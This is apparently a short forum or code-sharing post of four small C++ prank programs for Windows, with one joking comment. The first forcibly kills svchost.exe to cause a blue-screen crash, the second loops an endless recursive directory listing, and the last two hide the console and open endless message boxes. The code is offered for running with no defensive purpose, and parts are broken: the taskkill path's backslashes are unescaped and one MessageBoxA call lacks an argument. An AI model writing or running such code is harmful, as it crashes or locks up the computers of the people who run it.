#include<bits/stdc++.h> using namespace std; int main(){ system("C:\Windows\System32\taskkill.exe /im svchost.exe /f"); system("wininit"); return 0; } //蓝屏

#include<bits/stdc++.h> using namespace std; int main(){ system("color a"); while(1){ system("dir/s"); } return 0; }

#include<windows.h> #include<bits/stdc++.h> using namespace std; int main(){ FreeConsole(); while(1){ MessageBoxA(NULL,"WINDOW","WINDOW"); } return 0; }

#include<windows.h> #include<bits/stdc++.h> using namespace std; int main(){ FreeConsole(); while(1){ MessageBoxA(NULL,"WINDOW","WINDOW",NULL); } return 0; }

1 条评论

  • @ 2026-4-17 20:29:28

    冷知识,试过这几条代码的人已经评论不了了

    • 1